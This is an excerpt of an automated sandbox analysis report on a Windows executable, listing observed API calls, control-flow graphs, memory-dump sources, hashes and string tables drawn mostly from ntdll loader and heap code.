                                                                                                                control_flow_graph 221 40839c-40839e 222 4083a0-4083f8 call 41be20 call 408310 call 41b710 221->222 223 40833d-40835a call 40ace0 call 414e40 221->223 239 408400-408432 call 40f660 call 41a4c0 222->239 232 40835c-40836e PostThreadMessageW 223->232 233 40838e-408392 223->233 235 408370-40838a call 40a470 232->235 236 40838d 232->236 235->236 236->233 245 408434-40843c 239->245 246 408467-40846f 239->246 247 408456-408460 245->247 248 40843e-408445 245->248 247->239 250 408462-408465 247->250 248->247 249 408447-40844e 248->249 249->247 251 408450-408454 249->251 252 40848d-40849f call 41a450 250->252 251->247 254 408470-40848a call 41bda0 251->254 252->246 257 4084a1-40850c call 419cd0 252->257 254->252 257->246 261 408512-40856e call 419d10 257->261 261->246 264 408574-4085c1 call 41b3b0 call 41b3d0 call 41c090 call 41bda0 call 414a40 261->264
                                                                                                                APIs
                                                                                                                • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1699340438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_400000_881SP1exr1.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: MessagePostThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 1836367815-0
                                                                                                                • Opcode ID: b0d367043abb203b0db15c80fa1710186e02a9d286bca5a094bc596f62b81abf
                                                                                                                • Instruction ID: c642f279ee01c55a5a82685bb0bf4c09ec21e604d3ff80a8152a40c77f4ed0a4
                                                                                                                • Opcode Fuzzy Hash: b0d367043abb203b0db15c80fa1710186e02a9d286bca5a094bc596f62b81abf
                                                                                                                • Instruction Fuzzy Hash: FC61E7B0900309AFDB24DF64DD85FEB77E8EB48704F00057EF949A7281EB7469418BA9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 275 40830b-40835a call 41be20 call 41c9c0 call 40ace0 call 414e40 285 40835c-40836e PostThreadMessageW 275->285 286 40838e-408392 275->286 287 408370-40838a call 40a470 285->287 288 40838d 285->288 287->288 288->286
                                                                                                                APIs
                                                                                                                • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1699340438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_400000_881SP1exr1.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: MessagePostThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 1836367815-0
                                                                                                                • Opcode ID: 00d06d75f3fe86fd0c343dff79e9371933e1209f67ba1a258de8278e0a701324
                                                                                                                • Instruction ID: 642eaaa3ea69e9df636b6cfdd2fbfc5a9ef5043a268ced20851569b5d2e52d39
                                                                                                                • Opcode Fuzzy Hash: 00d06d75f3fe86fd0c343dff79e9371933e1209f67ba1a258de8278e0a701324
                                                                                                                • Instruction Fuzzy Hash: 5C01D871A8031877E720A6958C43FFE772C6B40B54F04411EFF04BA1C1D6F8690546EA
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 291 408310-40831f 292 408328-40835a call 41c9c0 call 40ace0 call 414e40 291->292 293 408323 call 41be20 291->293 301 40835c-40836e PostThreadMessageW 292->301 302 40838e-408392 292->302 293->292 303 408370-40838a call 40a470 301->303 304 40838d 301->304 303->304 304->302
                                                                                                                APIs
                                                                                                                • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1699340438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_400000_881SP1exr1.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: MessagePostThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 1836367815-0
                                                                                                                • Opcode ID: 6793861beeebbadff428f1e0055fcae04fb265a346085d9c044c4ec0df2940a0
                                                                                                                • Instruction ID: a0f03ca10d03d1d5c38d3c187be8154ddc7636efa3ebbcfd239e67dddfad06e3
                                                                                                                • Opcode Fuzzy Hash: 6793861beeebbadff428f1e0055fcae04fb265a346085d9c044c4ec0df2940a0
                                                                                                                • Instruction Fuzzy Hash: B4018471A8032877E720A6959C43FFE776C6B40B54F05012AFF04BA1C1E6A8690546EA
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 335 41a782-41a7aa call 41af20 338 41a7af-41a7c4 LookupPrivilegeValueW 335->338
                                                                                                                APIs
                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7C0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1699340438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_400000_881SP1exr1.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: LookupPrivilegeValue
                                                                                                                • String ID:
                                                                                                                • API String ID: 3899507212-0
                                                                                                                • Opcode ID: 064dabb3c5514f70655747349a56461b80c7b87b22f434a6884cb0fc95efc62c
                                                                                                                • Instruction ID: d2b59b103d22d13b5f580e1d9e742f69d860d928bdf5620435659320132029ff
                                                                                                                • Opcode Fuzzy Hash: 064dabb3c5514f70655747349a56461b80c7b87b22f434a6884cb0fc95efc62c
                                                                                                                • Instruction Fuzzy Hash: 76E065B5200204AFDB20DF65CC80EDB37A9AF85354F158159F949AB691D530A8158BB2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A65D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1699340438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_400000_881SP1exr1.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FreeHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 3298025750-0
                                                                                                                • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                • Instruction ID: a31e03847b69acb9206512889bce5d114748d47cfafea9ced6338f279cce3475
                                                                                                                • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                • Instruction Fuzzy Hash: 64E04FB12002046BD714DF59DC45EE777ADEF88754F014559FD0857241C630F910CAF0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7C0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1699340438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_400000_881SP1exr1.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: LookupPrivilegeValue
                                                                                                                • String ID:
                                                                                                                • API String ID: 3899507212-0
                                                                                                                • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                • Instruction ID: b8658252b81b08ed33e4a874e4d8f80b0614426e32f2ee3a7d9107b08e04f012
                                                                                                                • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                • Instruction Fuzzy Hash: 9EE01AB12002086BDB10DF49DC85EE737ADAF88654F018155BA0857241C934E8118BF5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A698
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1699340438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_400000_881SP1exr1.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ExitProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 621844428-0
                                                                                                                • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                • Instruction ID: 94fb8da58e6992106aa2b0ab061ea4c6965e877b66759b154152d16d38dd5c99
                                                                                                                • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                • Instruction Fuzzy Hash: B9D017726002187BD620EB99DC85FD777ACDF487A4F0180AABA1C6B242C531FA108AE1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 3ea2f2df63bec2df8ad88c2789c2fa908cb49d7db8661fadef020ced1b22c93b
                                                                                                                • Instruction ID: 50992192b305ff3528651dfe7f87b06346117b078d8ee56506c7cd7c8e7fe88f
                                                                                                                • Opcode Fuzzy Hash: 3ea2f2df63bec2df8ad88c2789c2fa908cb49d7db8661fadef020ced1b22c93b
                                                                                                                • Instruction Fuzzy Hash: CAB09BB19015C5C5DB52E7644608B1B7A0477D0705F15C063D7030653F4778C1D1E276
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                • API String ID: 0-2160512332
                                                                                                                • Opcode ID: 6831078340ed7eaa33a25aab99300e9900a7e77cf596fe50f12f8c26a539ad65
                                                                                                                • Instruction ID: 6c2ae6a4d7e966bdaa7e5f9c49059b7b9814d06982575d77943e6ecae968cde2
                                                                                                                • Opcode Fuzzy Hash: 6831078340ed7eaa33a25aab99300e9900a7e77cf596fe50f12f8c26a539ad65
                                                                                                                • Instruction Fuzzy Hash: F5928F71604342AFEB21CF29C840F6BBBE8BB94754F04491EFA9597361D7B0E845CB92
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                • Critical section debug info address, xrefs: 0148541F, 0148552E
                                                                                                                • undeleted critical section in freed memory, xrefs: 0148542B
                                                                                                                • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 014854E2
                                                                                                                • Thread identifier, xrefs: 0148553A
                                                                                                                • Critical section address, xrefs: 01485425, 014854BC, 01485534
                                                                                                                • double initialized or corrupted critical section, xrefs: 01485508
                                                                                                                • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 014854CE
                                                                                                                • Address of the debug info found in the active list., xrefs: 014854AE, 014854FA
                                                                                                                • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0148540A, 01485496, 01485519
                                                                                                                • Thread is in a state in which it cannot own a critical section, xrefs: 01485543
                                                                                                                • 8, xrefs: 014852E3
                                                                                                                • corrupted critical section, xrefs: 014854C2
                                                                                                                • Invalid debug info address of this critical section, xrefs: 014854B6
                                                                                                                • Critical section address., xrefs: 01485502
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                • API String ID: 0-2368682639
                                                                                                                • Opcode ID: 0c43329ea76a3c0bfe7e5d913d722f16d6e4a7f7521fa64909fdef648fe00abe
                                                                                                                • Instruction ID: 4b62dbe20165e8499ba96e0ff0d424f476c414607e50ec990eb2d535468b5200
                                                                                                                • Opcode Fuzzy Hash: 0c43329ea76a3c0bfe7e5d913d722f16d6e4a7f7521fa64909fdef648fe00abe
                                                                                                                • Instruction Fuzzy Hash: E5819D71A40359AFDB25DF9AC844BAEBBB5FB08714F10415EF604BB3A0D371A945CB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01482409
                                                                                                                • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 014822E4
                                                                                                                • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01482412
                                                                                                                • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 014825EB
                                                                                                                • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01482498
                                                                                                                • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01482506
                                                                                                                • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01482624
                                                                                                                • RtlpResolveAssemblyStorageMapEntry, xrefs: 0148261F
                                                                                                                • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 014824C0
                                                                                                                • @, xrefs: 0148259B
                                                                                                                • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01482602
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                                • API String ID: 0-4009184096
                                                                                                                • Opcode ID: 31d012726b030485760a7e381bffee51dd83fb00c608379c59f1a90490abbc91
                                                                                                                • Instruction ID: 8217d7f5f26b1368ab7ca5eee53a3452122ad508850409d981ae932bd921d44e
                                                                                                                • Opcode Fuzzy Hash: 31d012726b030485760a7e381bffee51dd83fb00c608379c59f1a90490abbc91
                                                                                                                • Instruction Fuzzy Hash: C10290B1D002299BEB31DB55CC80F9EB7B8AF54304F0041EBE609A7261D7B09E84CF69
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                • API String ID: 0-2515994595
                                                                                                                • Opcode ID: d7a461b05de77c7ef4968b985a8187a325c8ef3ce30a9d6a8f43504b1730be4f
                                                                                                                • Instruction ID: 8e3ee1a118eec9513eba0a9f0228acf58528e4e31f523a8e1128ca634bd36755
                                                                                                                • Opcode Fuzzy Hash: d7a461b05de77c7ef4968b985a8187a325c8ef3ce30a9d6a8f43504b1730be4f
                                                                                                                • Instruction Fuzzy Hash: 4251C0B11043169BD325DF198884BEBBBECAFA4644F14491FF958C32A1E770D609CBE2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                • API String ID: 0-1700792311
                                                                                                                • Opcode ID: 237f4278b233c79954986934e6bddd9a3421fbeb46ad37f088e5eb933cbb0aae
                                                                                                                • Instruction ID: 32263cd989e315fa3f6f2b87c1d33bbd9c7375125ad54d0acb705b93cdbf51b5
                                                                                                                • Opcode Fuzzy Hash: 237f4278b233c79954986934e6bddd9a3421fbeb46ad37f088e5eb933cbb0aae
                                                                                                                • Instruction Fuzzy Hash: B4D1D03D600681DFDB62DFAAC440AAABBF1FF69A04F08806EE5559B362C7349945CB14
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                • HandleTraces, xrefs: 01498C8F
                                                                                                                • VerifierDlls, xrefs: 01498CBD
                                                                                                                • VerifierFlags, xrefs: 01498C50
                                                                                                                • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01498A67
                                                                                                                • VerifierDebug, xrefs: 01498CA5
                                                                                                                • AVRF: -*- final list of providers -*- , xrefs: 01498B8F
                                                                                                                • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01498A3D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                • API String ID: 0-3223716464
                                                                                                                • Opcode ID: 6483ec82411e03f7f5c1bebf1900a1e11dbf211edacf0e0d691ea30bfea5df73
                                                                                                                • Instruction ID: a1c6e73a3884622be1140c4c3867333522dd97a781e5b03736cb9103bf7869b8
                                                                                                                • Opcode Fuzzy Hash: 6483ec82411e03f7f5c1bebf1900a1e11dbf211edacf0e0d691ea30bfea5df73
                                                                                                                • Instruction Fuzzy Hash: 3B91337260030BAFDB22EFAD8880B1B7FA4AFA5714F05051EFA446F3A1D7709845CB91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                                • API String ID: 0-1109411897
                                                                                                                • Opcode ID: a02442c54a46095d7ae8c2618239ef158e78889ed8c737c59952ec45ca48d0cc
                                                                                                                • Instruction ID: 1812330d3381729cb6044f1fc3ede3cb27bf9891ddf2703bbd91e314a29e60cb
                                                                                                                • Opcode Fuzzy Hash: a02442c54a46095d7ae8c2618239ef158e78889ed8c737c59952ec45ca48d0cc
                                                                                                                • Instruction Fuzzy Hash: FBA26074A0562A8FDB65CF19CC887AABBB5BF45314F1442EAD90DA7364DB309E85CF00
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                • API String ID: 0-792281065
                                                                                                                • Opcode ID: 1b25143297a9136c6ac77ad9fcfaa259878c9045ff8b05e67beb24c773fc53f5
                                                                                                                • Instruction ID: b7a228affda02770d02e73140d45df73b7363b0bce37869a84a4c2d63326189f
                                                                                                                • Opcode Fuzzy Hash: 1b25143297a9136c6ac77ad9fcfaa259878c9045ff8b05e67beb24c773fc53f5
                                                                                                                • Instruction Fuzzy Hash: B7914A70B00316DBEB26EF99D849BAF7BA1BB11B24F05002FE9106B3B1D7708846C794
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01469A01
                                                                                                                • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01469A2A
                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 01469A11, 01469A3A
                                                                                                                • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 014699ED
                                                                                                                • LdrpInitShimEngine, xrefs: 014699F4, 01469A07, 01469A30
                                                                                                                • apphelp.dll, xrefs: 01406496
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                • API String ID: 0-204845295
                                                                                                                • Opcode ID: da7db7155b99047a53995353e6fc60e7dae39110652316aba4a49d5f10af7d28
                                                                                                                • Instruction ID: 01ee58486f23cfe572b2a999cd5999f43456082b97b2c46070bb0d9b2e9c3159
                                                                                                                • Opcode Fuzzy Hash: da7db7155b99047a53995353e6fc60e7dae39110652316aba4a49d5f10af7d28
                                                                                                                • Instruction Fuzzy Hash: 8651E271218301DFE722DF26D841A6B77E8FB94648F01052FF5969B2B0D670E908CB93
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01482178
                                                                                                                • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0148219F
                                                                                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 014821BF
                                                                                                                • SXS: %s() passed the empty activation context, xrefs: 01482165
                                                                                                                • RtlGetAssemblyStorageRoot, xrefs: 01482160, 0148219A, 014821BA
                                                                                                                • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01482180
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                • API String ID: 0-861424205
                                                                                                                • Opcode ID: 7a7e5178879be4b67e64a0abcda37860713b6091cb43c6e7a5a26767b46aac80
                                                                                                                • Instruction ID: f8837935a0db0886546bc661ea444aa0c516eae9d712e9b854fc29ce602f5acb
                                                                                                                • Opcode Fuzzy Hash: 7a7e5178879be4b67e64a0abcda37860713b6091cb43c6e7a5a26767b46aac80
                                                                                                                • Instruction Fuzzy Hash: BE31073AB402157BFB21DA9A9C41F5F7F78DF64A94F15005FFB04A7360D6B09A01C6A1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                • Unable to build import redirection Table, Status = 0x%x, xrefs: 014881E5
                                                                                                                • Loading import redirection DLL: '%wZ', xrefs: 01488170
                                                                                                                • LdrpInitializeImportRedirection, xrefs: 01488177, 014881EB
                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 0144C6C3
                                                                                                                • LdrpInitializeProcess, xrefs: 0144C6C4
                                                                                                                • minkernel\ntdll\ldrredirect.c, xrefs: 01488181, 014881F5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                • API String ID: 0-475462383
                                                                                                                • Opcode ID: fb93a7bf095fc1731631be06b429d5f23355cfcc5e1fe35edac94dc000ae8750
                                                                                                                • Instruction ID: a41869852b1da3ef3aa640ff0168f802ccb1543a01bdbc82ed02d1e72612e88d
